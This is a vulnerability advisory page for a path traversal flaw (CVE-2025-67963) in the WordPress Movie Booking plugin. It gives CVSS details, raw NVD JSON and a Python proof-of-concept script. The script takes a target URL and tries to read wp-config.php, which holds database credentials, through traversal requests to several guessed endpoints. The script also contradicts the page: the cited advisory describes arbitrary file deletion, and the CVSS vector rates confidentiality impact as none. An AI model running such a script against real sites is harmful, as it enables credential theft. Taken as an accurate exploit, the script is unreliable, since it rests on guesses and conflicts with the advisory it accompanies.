Security Vulnerability Report
中文
CVE-2025-67963 CVSS 8.6 HIGH

CVE-2025-67963

Published: 2026-01-22 17:16:06
Last Modified: 2026-04-15 00:35:42

Description

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in ovatheme Movie Booking movie-booking allows Path Traversal.This issue affects Movie Booking: from n/a through <= 1.1.5.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Movie Booking <= 1.1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67963 PoC - WordPress Movie Booking Path Traversal # Affected: Movie Booking Plugin <= 1.1.5 import requests import sys from urllib.parse import quote target = input("Enter target URL (e.g., http://example.com): ").rstrip('/') # Target file to read (wp-config.php) file_to_read = '../../../wp-config.php' encoded_path = quote(file_to_read, safe='') # Try common vulnerable endpoints endpoints = [ '/wp-admin/admin-ajax.php', '/wp-content/plugins/movie-booking/inc/file-handler.php', '/wp-content/plugins/movie-booking/includes/file-download.php' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'X-Requested-With': 'XMLHttpRequest' } print(f"[*] Testing CVE-2025-67963 on {target}") print(f"[*] Attempting to read wp-config.php via path traversal\n") for endpoint in endpoints: url = target + endpoint # Common parameter names for file operations params = { 'action': 'mvb_file_download', 'file': encoded_path } try: print(f"[*] Testing endpoint: {endpoint}") response = requests.get(url, params=params, headers=headers, timeout=10) if response.status_code == 200 and 'DB_NAME' in response.text: print(f"[!] VULNERABLE! Found wp-config.php content:") print(response.text[:500]) break elif response.status_code == 200: print(f"[+] Request successful, checking content...") if len(response.text) > 0: print(f"[+] Response length: {len(response.text)} bytes") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") print("\n[*] PoC completed. Manual verification recommended.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67963", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:05.867", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in ovatheme Movie Booking movie-booking allows Path Traversal.This issue affects Movie Booking: from n/a through <= 1.1.5."}, {"lang": "es", "value": "Limitación Inadecuada de un Nombre de Ruta a un Directorio Restringido ('Salto de Ruta') vulnerabilidad en ovatheme Movie Booking movie-booking permite Salto de Ruta. Este problema afecta a Movie Booking: desde n/a hasta &lt;= 1.1.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/movie-booking/vulnerability/wordpress-movie-booking-plugin-1-1-5-arbitrary-file-deletion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}